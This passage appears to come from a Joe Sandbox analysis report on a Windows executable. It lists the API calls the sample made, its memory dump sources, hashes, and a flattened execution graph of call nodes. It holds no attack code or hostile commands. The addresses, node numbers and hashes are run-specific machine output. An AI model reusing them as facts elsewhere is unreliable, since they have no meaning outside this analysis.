                                                                  • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                  • String ID:
                                                                  • API String ID: 730355536-0
                                                                  APIs
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue
                                                                  • String ID: )q@
                                                                  • API String ID: 3660427363-2284170586
                                                                  • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                  • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                  • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                  • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                  • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CommandHandleLineModule
                                                                  • String ID: U1hd.@
                                                                  • API String ID: 2123368496-2904493091
                                                                  • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                  • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                  • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                  • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                  APIs
                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                  • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                  • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.3047534527.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.3047499637.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047571667.000000000040B000.00000004.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000002.00000002.3047599538.0000000000411000.00000002.00000001.01000000.00000005.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep
                                                                  • String ID:
                                                                  • API String ID: 1458359878-0
                                                                  • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                  • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                  • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                  • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                  Execution Graph

                                                                  Execution Coverage:16.1%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:4%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:69
53662->53669 53663->53636 53664 403744 4 API calls 53664->53668 53665 403450 4 API calls 53665->53668 53666 403744 4 API calls 53666->53669 53667 403450 4 API calls 53667->53669 53668->53657 53668->53660 53668->53664 53668->53665 53668->53669 53669->53656 53669->53662 53669->53666 53669->53667 53670 451268 21 API calls 53669->53670 53670->53669 53671->53650 53673 451283 53672->53673 53674 451278 53672->53674 53678 45120c 21 API calls 53673->53678 53674->53659 53676 45128e 53676->53674 53679 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53676->53679 53678->53676 53679->53674 53093 41fb50 53094 41fb59 53093->53094 53097 41fdf4 53094->53097 53096 41fb66 53098 41fee6 53097->53098 53099 41fe0b 53097->53099 53098->53096 53099->53098 53118 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53099->53118 53101 41fe41 53102 41fe45 53101->53102 53103 41fe6b 53101->53103 53119 41fb94 53102->53119 53128 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53103->53128 53106 41fe79 53109 41fea3 53106->53109 53110 41fe7d 53106->53110 53108 41fb94 10 API calls 53117 41fe69 53108->53117 53112 41fb94 10 API calls 53109->53112 53111 41fb94 10 API calls 53110->53111 53113 41fe8f 53111->53113 53114 41feb5 53112->53114 53115 41fb94 10 API calls 53113->53115 53116 41fb94 10 API calls 53114->53116 53115->53117 53116->53117 53117->53096 53118->53101 53120 41fbaf 53119->53120 53121 41f934 4 API calls 53120->53121 53122 41fbc5 53120->53122 53121->53122 53129 41f934 53122->53129 53124 41fc0d 53125 41fc30 SetScrollInfo 53124->53125 53137 41fa94 53125->53137 53128->53106 53148 4181d8 53129->53148 53131 41f951 GetWindowLongA 53132 41f98e 53131->53132 53133 41f96e 53131->53133 53151 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53132->53151 53150 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53133->53150 53136 41f97a 53136->53124 53138 41faa2 53137->53138 53139 41faaa 53137->53139 53138->53108 53140 41fae9 53139->53140 53141 41fad9 
53139->53141 53147 41fae7 53139->53147 53153 417e40 IsWindowVisible ScrollWindow SetWindowPos 53140->53153 53152 417e40 IsWindowVisible ScrollWindow SetWindowPos 53141->53152 53142 41fb29 GetScrollPos 53142->53138 53145 41fb34 53142->53145 53146 41fb43 SetScrollPos 53145->53146 53146->53138 53147->53142 53149 4181e2 53148->53149 53149->53131 53150->53136 53151->53136 53152->53147 53153->53147 53154 420590 53155 4205a3 53154->53155 53175 415b28 53155->53175 53157 4206ea 53158 420701 53157->53158 53182 4146cc KiUserCallbackDispatcher 53157->53182 53159 420718 53158->53159 53183 414710 KiUserCallbackDispatcher 53158->53183 53165 42073a 53159->53165 53184 420058 12 API calls 53159->53184 53160 4205de 53160->53157 53161 420649 53160->53161 53168 42063a MulDiv 53160->53168 53180 420840 20 API calls 53161->53180 53166 420662 53166->53157 53181 420058 12 API calls 53166->53181 53179 41a2fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53168->53179 53171 42067f 53172 42069b MulDiv 53171->53172 53173 4206be 53171->53173 53172->53173 53173->53157 53174 4206c7 MulDiv 53173->53174 53174->53157 53176 415b3a 53175->53176 53185 414468 53176->53185 53178 415b52 53178->53160 53179->53161 53180->53166 53181->53171 53182->53158 53183->53159 53184->53165 53186 414482 53185->53186 53189 410640 53186->53189 53188 414498 53188->53178 53192 40de8c 53189->53192 53191 410646 53191->53188 53193 40deee 53192->53193 53194 40de9f 53192->53194 53199 40defc 53193->53199 53197 40defc 19 API calls 53194->53197 53198 40dec9 53197->53198 53198->53191 53200 40df0c 53199->53200 53202 40df22 53200->53202 53211 40e284 53200->53211 53227 40d7c8 53200->53227 53230 40e134 53202->53230 53205 40d7c8 5 API calls 53206 40df2a 53205->53206 53206->53205 53207 40df96 53206->53207 53233 40dd48 53206->53233 53209 40e134 5 API calls 53207->53209 53210 40def8 53209->53210 53210->53191 53247 40eb54 53211->53247 53213 403778 4 API calls 53214 40e2bf 53213->53214 53214->53213 53215 40e375 53214->53215 53309 
40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53214->53309 53310 40e268 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53214->53310 53216 40e390 53215->53216 53217 40e39f 53215->53217 53256 40e5a8 53216->53256 53306 40bc0c 53217->53306 53223 40e39d 53224 403400 4 API calls 53223->53224 53225 40e444 53224->53225 53225->53200 53228 40ebf0 5 API calls 53227->53228 53229 40d7d2 53228->53229 53229->53200 53343 40d6a4 53230->53343 53352 40e13c 53233->53352 53236 40eb54 5 API calls 53237 40dd86 53236->53237 53238 40eb54 5 API calls 53237->53238 53239 40dd91 53238->53239 53240 40dda3 53239->53240 53241 40ddac 53239->53241 53246 40dda9 53239->53246 53362 40dcb0 19 API calls 53240->53362 53359 40dbc0 53241->53359 53244 403420 4 API calls 53245 40de77 53244->53245 53245->53206 53246->53244 53312 40d968 53247->53312 53250 4034e0 4 API calls 53251 40eb77 53250->53251 53252 403744 4 API calls 53251->53252 53253 40eb7e 53252->53253 53254 40d968 5 API calls 53253->53254 53255 40eb8c 53254->53255 53255->53214 53257 40e5d4 53256->53257 53258 40e5de 53256->53258 53317 40d628 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53257->53317 53260 40e620 53258->53260 53261 40e6c1 53258->53261 53262 40e651 53258->53262 53263 40e6a3 53258->53263 53264 40e6f9 53258->53264 53265 40e67d 53258->53265 53266 40e6de 53258->53266 53267 40e75e 53258->53267 53299 40e644 53258->53299 53318 40d94c 53260->53318 53328 40eb90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53261->53328 53262->53299 53324 40da00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53262->53324 53327 40dfcc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53263->53327 53268 40d94c 5 API calls 53264->53268 53325 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53265->53325 53330 40ea78 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53266->53330 53274 40d94c 5 API calls 53267->53274 53277 40e701 53268->53277 53270 403400 4 API 
calls 53278 40e7d3 53270->53278 53281 40e766 53274->53281 53285 40e70b 53277->53285 53293 40e705 53277->53293 53278->53223 53279 40e6cc 53329 409f20 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53279->53329 53280 40e688 53326 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53280->53326 53288 40e783 53281->53288 53289 40e76a 53281->53289 53283 40e649 53323 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53283->53323 53284 40e62c 53321 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53284->53321 53331 40ebf0 53285->53331 53337 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53288->53337 53296 40ebf0 5 API calls 53289->53296 53294 40e709 53293->53294 53298 40ebf0 5 API calls 53293->53298 53294->53299 53335 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53294->53335 53296->53299 53297 40e637 53322 40e454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53297->53322 53302 40e72c 53298->53302 53299->53270 53334 40da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53302->53334 53303 40e74e 53336 40e4bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53303->53336 53338 40bbb8 53306->53338 53309->53214 53310->53214 53311 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53311->53223 53315 40d973 53312->53315 53313 40d9ad 53313->53250 53315->53313 53316 40d9b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53315->53316 53316->53315 53317->53258 53319 40ebf0 5 API calls 53318->53319 53320 40d956 53319->53320 53320->53283 53320->53284 53321->53297 53322->53299 53323->53262 53324->53299 53325->53280 53326->53299 53327->53299 53328->53279 53329->53299 53330->53299 53332 40d968 5 API calls 53331->53332 53333 40ebfd 53332->53333 53333->53299 53334->53294 53335->53303 53336->53299 53337->53299 53339 40bbca 53338->53339 53341 40bbef 53338->53341 53339->53341 53342 40bc6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53339->53342 53341->53223 
53341->53311 53342->53341 53344 40ebf0 5 API calls 53343->53344 53345 40d6b1 53344->53345 53346 40d6c4 53345->53346 53350 40ecf4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53345->53350 53346->53206 53348 40d6bf 53351 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53348->53351 53350->53348 53351->53346 53353 40d94c 5 API calls 53352->53353 53354 40e153 53353->53354 53355 40ebf0 5 API calls 53354->53355 53358 40dd7b 53354->53358 53356 40e160 53355->53356 53356->53358 53363 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53356->53363 53358->53236 53364 40ad64 19 API calls 53359->53364 53361 40dbe8 53361->53246 53362->53246 53363->53358 53364->53361 53680 413634 SetWindowLongA GetWindowLongA 53681 413691 SetPropA SetPropA 53680->53681 53682 413673 GetWindowLongA 53680->53682 53687 41f394 53681->53687 53682->53681 53683 413682 SetWindowLongA 53682->53683 53683->53681 53692 423c04 53687->53692 53786 423a7c 53687->53786 53793 415268 53687->53793 53688 4136e1 53697 423c3a 53692->53697 53695 423ce4 53698 423ceb 53695->53698 53699 423d1f 53695->53699 53696 423c85 53700 423c8b 53696->53700 53701 423d48 53696->53701 53713 423c5b 53697->53713 53800 423b60 53697->53800 53702 423cf1 53698->53702 53737 423fa9 53698->53737 53705 424092 IsIconic 53699->53705 53706 423d2a 53699->53706 53703 423c90 53700->53703 53704 423cbd 53700->53704 53707 423d63 53701->53707 53708 423d5a 53701->53708 53710 423f0b SendMessageA 53702->53710 53711 423cff 53702->53711 53714 423c96 53703->53714 53715 423dee 53703->53715 53704->53713 53735 423cd6 53704->53735 53736 423e37 53704->53736 53712 4240a6 GetFocus 53705->53712 53705->53713 53716 423d33 53706->53716 53717 4240ce 53706->53717 53815 42418c 11 API calls 53707->53815 53718 423d70 53708->53718 53719 423d61 53708->53719 53710->53713 53711->53713 53739 423cb8 53711->53739 53766 423f4e 53711->53766 53712->53713 53723 4240b7 53712->53723 53713->53688 53724 423e16 PostMessageA 53714->53724 53725 423c9f 
53714->53725 53828 423b7c NtdllDefWindowProc_A 53715->53828 53721 4240e5 53716->53721 53716->53739 53846 424848 WinHelpA PostMessageA 53717->53846 53816 4241d4 IsIconic 53718->53816 53824 423b7c NtdllDefWindowProc_A 53719->53824 53733 424103 53721->53733 53734 4240ee 53721->53734 53845 41efec GetCurrentThreadId 73A25940 53723->53845 53834 423b7c NtdllDefWindowProc_A 53724->53834 53730 423ca8 53725->53730 53731 423e9d 53725->53731 53743 423cb1 53730->53743 53744 423dc6 IsIconic 53730->53744 53745 423ea6 53731->53745 53746 423ed7 53731->53746 53732 423e31 53732->53713 53853 424524 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53733->53853 53847 4244cc 53734->53847 53738 423e03 53735->53738 53735->53739 53804 423b7c NtdllDefWindowProc_A 53736->53804 53737->53713 53757 423fcf IsWindowEnabled 53737->53757 53829 424170 53738->53829 53739->53713 53814 423b7c NtdllDefWindowProc_A 53739->53814 53742 4240be 53742->53713 53754 4240c6 SetFocus 53742->53754 53743->53739 53755 423d89 53743->53755 53748 423de2 53744->53748 53749 423dd6 53744->53749 53756 423b0c 5 API calls 53745->53756 53811 423b7c NtdllDefWindowProc_A 53746->53811 53827 423b7c NtdllDefWindowProc_A 53748->53827 53826 423bb8 15 API calls 53749->53826 53753 423e3d 53761 423e7b 53753->53761 53762 423e59 53753->53762 53754->53713 53755->53713 53825 422c44 ShowWindow PostMessageA PostQuitMessage 53755->53825 53763 423eae 53756->53763 53757->53713 53764 423fdd 53757->53764 53760 423edd 53765 423ef5 53760->53765 53812 41ee9c GetCurrentThreadId 73A25940 53760->53812 53768 423a7c 6 API calls 53761->53768 53805 423b0c 53762->53805 53770 423ec0 53763->53770 53835 41ef50 53763->53835 53778 423fe4 IsWindowVisible 53764->53778 53774 423a7c 6 API calls 53765->53774 53766->53713 53775 423f70 IsWindowEnabled 53766->53775 53777 423e83 PostMessageA 53768->53777 53841 423b7c NtdllDefWindowProc_A 53770->53841 53774->53713 53775->53713 53779 423f7e 53775->53779 53777->53713 53778->53713 53780 423ff2 GetFocus 53778->53780 
53842 412308 7 API calls 53779->53842 53782 4181d8 53780->53782 53783 424007 SetFocus 53782->53783 53843 415238 53783->53843 53787 423b05 53786->53787 53788 423a8c 53786->53788 53787->53688 53788->53787 53789 423a92 EnumWindows 53788->53789 53789->53787 53790 423aae GetWindow GetWindowLongA 53789->53790 53945 423a14 GetWindow 53789->53945 53791 423acd 53790->53791 53791->53787 53792 423af9 SetWindowPos 53791->53792 53792->53787 53792->53791 53794 415275 53793->53794 53795 4152d0 53794->53795 53796 4152db 53794->53796 53799 4152d9 53794->53799 53795->53799 53949 415054 46 API calls 53795->53949 53948 424b84 13 API calls 53796->53948 53799->53688 53801 423b75 53800->53801 53802 423b6a 53800->53802 53801->53695 53801->53696 53802->53801 53854 408710 GetSystemDefaultLCID 53802->53854 53804->53753 53806 423b5a PostMessageA 53805->53806 53808 423b1b 53805->53808 53806->53713 53807 423b52 53917 40b3c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53807->53917 53808->53806 53808->53807 53810 423b46 SetWindowPos 53808->53810 53810->53807 53810->53808 53811->53760 53813 41ef21 53812->53813 53813->53765 53814->53713 53815->53713 53817 42421b 53816->53817 53818 4241e5 SetActiveWindow 53816->53818 53817->53713 53918 423644 53818->53918 53821 423b0c 5 API calls 53822 424202 53821->53822 53822->53817 53823 424215 SetFocus 53822->53823 53823->53817 53824->53713 53825->53713 53826->53713 53827->53713 53828->53713 53930 41db28 53829->53930 53832 424188 53832->53713 53833 42417c LoadIconA 53833->53832 53834->53732 53836 41ef84 53835->53836 53837 41ef58 IsWindow 53835->53837 53836->53770 53838 41ef72 53837->53838 53839 41ef67 EnableWindow 53837->53839 53838->53836 53838->53837 53840 402660 4 API calls 53838->53840 53839->53838 53840->53838 53841->53713 53842->53713 53844 415253 SetFocus 53843->53844 53844->53713 53845->53742 53846->53732 53848 4244f2 53847->53848 53849 4244d8 53847->53849 53852 402648 4 API calls 53848->53852 53850 424507 53849->53850 53851 4244df SendMessageA 
53849->53851 53850->53713 53851->53850 53852->53850 53853->53732 53909 408558 GetLocaleInfoA 53854->53909 53857 403450 4 API calls 53858 408750 53857->53858 53859 408558 5 API calls 53858->53859 53860 408765 53859->53860 53861 408558 5 API calls 53860->53861 53862 408789 53861->53862 53915 4085a4 GetLocaleInfoA 53862->53915 53865 4085a4 GetLocaleInfoA 53866 4087b9 53865->53866 53867 408558 5 API calls 53866->53867 53868 4087d3 53867->53868 53869 4085a4 GetLocaleInfoA 53868->53869 53870 4087f0 53869->53870 53871 408558 5 API calls 53870->53871 53872 40880a 53871->53872 53873 403450 4 API calls 53872->53873 53874 408817 53873->53874 53875 408558 5 API calls 53874->53875 53876 40882c 53875->53876 53877 403450 4 API calls 53876->53877 53878 408839 53877->53878 53879 4085a4 GetLocaleInfoA 53878->53879 53880 408847 53879->53880 53881 408558 5 API calls 53880->53881 53882 408861 53881->53882 53883 403450 4 API calls 53882->53883 53884 40886e 53883->53884 53885 408558 5 API calls 53884->53885 53886 408883 53885->53886 53887 403450 4 API calls 53886->53887 53888 408890 53887->53888 53889 408558 5 API calls 53888->53889 53890 4088a5 53889->53890 53891 4088c2 53890->53891 53892 4088b3 53890->53892 53894 403494 4 API calls 53891->53894 53893 403494 4 API calls 53892->53893 53895 4088c0 53893->53895 53894->53895 53896 408558 5 API calls 53895->53896 53897 4088e4 53896->53897 53898 408901 53897->53898 53899 4088f2 53897->53899 53910 408591 53909->53910 53911 40857f 53909->53911 53913 403494 4 API calls 53910->53913 53912 4034e0 4 API calls 53911->53912 53914 40858f 53912->53914 53913->53914 53914->53857 53916 4085c0 53915->53916 53916->53865 53917->53806 53926 4235f0 SystemParametersInfoA 53918->53926 53921 42365d ShowWindow 53923 423668 53921->53923 53924 42366f 53921->53924 53929 423620 SystemParametersInfoA 53923->53929 53924->53821 53927 42360e 53926->53927 53927->53921 53928 423620 SystemParametersInfoA 53927->53928 53928->53921 53929->53924 53933 41db4c 53930->53933 53934 
41db32 53933->53934 53935 41db59 53933->53935 53934->53832 53934->53833 53935->53934 53942 40cc68 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53935->53942 53937 41db76 53937->53934 53938 41db90 53937->53938 53939 41db83 53937->53939 53943 41bd84 11 API calls 53938->53943 53944 41b380 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53939->53944 53942->53937 53943->53934 53944->53934 53946 423a35 GetWindowLongA 53945->53946 53947 423a41 53945->53947 53946->53947 53948->53799 53949->53799 53950 46b930 53951 46b964 53950->53951 53984 46bdcd 53950->53984 53953 46b9a0 53951->53953 53956 46b9fc 53951->53956 53957 46b9da 53951->53957 53958 46b9eb 53951->53958 53959 46b9b8 53951->53959 53960 46b9c9 53951->53960 53952 403400 4 API calls 53955 46be0c 53952->53955 53953->53984 54041 468a9c 53953->54041 53961 403400 4 API calls 53955->53961 54273 46b8c0 45 API calls 53956->54273 54006 46b4f0 53957->54006 54272 46b6b0 67 API calls 53958->54272 54270 46b240 47 API calls 53959->54270 54271 46b3a8 42 API calls 53960->54271 53967 46be14 53961->53967 53968 46b9be 53968->53953 53968->53984 53969 46ba38 53970 4942ac 18 API calls 53969->53970 53981 46ba7b 53969->53981 53969->53984 53970->53981 53972 414ae0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53972->53981 53973 46bb9e 54274 482b48 123 API calls 53973->54274 53976 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53976->53981 53977 42cbb8 6 API calls 53977->53981 53978 46bbb9 53978->53984 53979 46bbf7 54059 469d44 53979->54059 53980 46ad88 23 API calls 53980->53981 53981->53972 53981->53973 53981->53976 53981->53977 53981->53979 53981->53980 53981->53984 54002 46bcbf 53981->54002 54044 4689d8 53981->54044 54052 46aaf4 53981->54052 54197 482648 53981->54197 54283 46affc 19 API calls 53981->54283 53984->53952 53985 46ad88 23 API calls 53985->53984 53987 46bc5d 53988 403450 4 API calls 53987->53988 53989 46bc6d 53988->53989 53990 46bcc9 53989->53990 53991 46bc79 53989->53991 53996 46bd8b 53990->53996 
54120 46ad88 53990->54120 53992 457d3c 24 API calls 53991->53992 53993 46bc98 53992->53993 53995 457d3c 24 API calls 53993->53995 53995->54002 53997 46bce3 54002->53985 54284 46c244 54006->54284 54009 46b672 54010 403420 4 API calls 54009->54010 54013 46b68c 54010->54013 54011 414ae0 4 API calls 54012 46b53e 54011->54012 54014 46b65e 54012->54014 54287 455f58 13 API calls 54012->54287 54015 403400 4 API calls 54013->54015 54014->54009 54017 403450 4 API calls 54014->54017 54018 46b694 54015->54018 54017->54009 54019 403400 4 API calls 54018->54019 54020 46b69c 54019->54020 54020->53953 54021 46b621 54021->54009 54021->54014 54027 42cd40 7 API calls 54021->54027 54022 42cd40 7 API calls 54024 46b5fa 54022->54024 54023 46b5c1 54023->54009 54023->54021 54023->54022 54024->54021 54029 45142c 4 API calls 54024->54029 54025 46b55c 54025->54023 54288 466428 54025->54288 54028 46b637 54027->54028 54028->54014 54033 45142c 4 API calls 54028->54033 54031 46b611 54029->54031 54293 47e618 42 API calls 54031->54293 54032 466428 19 API calls 54035 46b59c 54032->54035 54036 46b64e 54033->54036 54037 4513fc 4 API calls 54035->54037 54294 47e618 42 API calls 54036->54294 54039 46b5b1 54037->54039 54292 47e618 42 API calls 54039->54292 54042 4689d8 19 API calls 54041->54042 54043 468aab 54042->54043 54043->53969 54047 468a07 54044->54047 54045 4078e4 19 API calls 54046 468a40 54045->54046 54415 453318 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54046->54415 54047->54045 54049 468a48 54047->54049 54050 403400 4 API calls 54049->54050 54051 468a60 54050->54051 54051->53981 54053 46ab05 54052->54053 54054 46ab00 54052->54054 54501 4698a8 46 API calls 54053->54501 54058 46ab03 54054->54058 54416 46a560 54054->54416 54056 46ab0d 54056->53981 54058->53981 54060 403400 4 API calls 54059->54060 54061 469d72 54060->54061 54524 47d4e4 54061->54524 54063 469dd5 54064 469df2 54063->54064 54065 469dd9 54063->54065 54067 469de3 54064->54067 54534 49419c LocalAlloc TlsSetValue TlsGetValue 
TlsGetValue 54064->54534 54531 466628 54065->54531 54070 469f11 54067->54070 54071 469f7c 54067->54071 54119 46a086 54067->54119 54069 469e0e 54069->54067 54073 469e16 54069->54073 54074 403494 4 API calls 54070->54074 54075 403494 4 API calls 54071->54075 54072 403420 4 API calls 54076 46a0b0 54072->54076 54077 46ad88 23 API calls 54073->54077 54078 469f1e 54074->54078 54079 469f89 54075->54079 54076->53987 54080 469e23 54077->54080 54081 40357c 4 API calls 54078->54081 54082 40357c 4 API calls 54079->54082 54093 469e64 54080->54093 54094 469e4c SetActiveWindow 54080->54094 54083 469f2b 54081->54083 54084 469f96 54082->54084 54085 40357c 4 API calls 54083->54085 54086 40357c 4 API calls 54084->54086 54087 469f38 54085->54087 54088 469fa3 54086->54088 54090 40357c 4 API calls 54087->54090 54089 40357c 4 API calls 54088->54089 54092 469fb0 54089->54092 54091 469f45 54090->54091 54095 466628 20 API calls 54091->54095 54096 40357c 4 API calls 54092->54096 54535 42f558 54093->54535 54094->54093 54097 469f53 54095->54097 54098 469fbe 54096->54098 54099 40357c 4 API calls 54097->54099 54100 414b10 4 API calls 54098->54100 54102 469f5c 54099->54102 54103 469f7a 54100->54103 54106 40357c 4 API calls 54102->54106 54552 466960 54103->54552 54109 469f69 54106->54109 54108 469eb5 54111 46ac04 21 API calls 54108->54111 54110 414b10 4 API calls 54109->54110 54110->54103 54112 469ee7 54111->54112 54112->53987 54113 469fe0 54114 414b10 4 API calls 54113->54114 54113->54119 54115 46a043 54114->54115 54555 49505c MulDiv 54115->54555 54117 46a060 54118 414b10 4 API calls 54117->54118 54118->54119 54119->54072 54121 468a9c 19 API calls 54120->54121 54122 46ada0 54121->54122 54123 46adc2 54122->54123 54124 4650f4 7 API calls 54122->54124 54641 4650f4 54123->54641 54124->54123 54128 46adda 54129 46ac04 21 API calls 54128->54129 54130 46ae12 54129->54130 54131 414b10 4 API calls 54130->54131 54132 46ae26 54131->54132 54133 46ae32 54132->54133 54134 46ae5c 54132->54134 54135 414b10 4 API 
calls 54133->54135 54137 46ae7b 54134->54137 54138 46aea5 54134->54138 54136 46ae46 54135->54136 54140 414b10 4 API calls 54136->54140 54141 414b10 4 API calls 54137->54141 54139 414b10 4 API calls 54138->54139 54142 46aeb9 54139->54142 54143 46ae5a 54140->54143 54144 46ae8f 54141->54144 54145 414b10 4 API calls 54142->54145 54658 46ab1c 54143->54658 54146 414b10 4 API calls 54144->54146 54145->54143 54146->54143 54150 468a9c 19 API calls 54152 46af57 54150->54152 54151 46aef7 54151->54150 54153 46afba 54152->54153 54663 4941f8 18 API calls 54152->54663 54153->53997 54198 46c244 48 API calls 54197->54198 54199 48268b 54198->54199 54200 482694 54199->54200 54900 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54199->54900 54202 414ae0 4 API calls 54200->54202 54203 4826a4 54202->54203 54204 403450 4 API calls 54203->54204 54205 4826b1 54204->54205 54710 46c59c 54205->54710 54208 4826c1 54210 414ae0 4 API calls 54208->54210 54211 4826d1 54210->54211 54212 403450 4 API calls 54211->54212 54213 4826de 54212->54213 54214 469690 SendMessageA 54213->54214 54215 4826f7 54214->54215 54216 482748 54215->54216 54902 4797dc 23 API calls 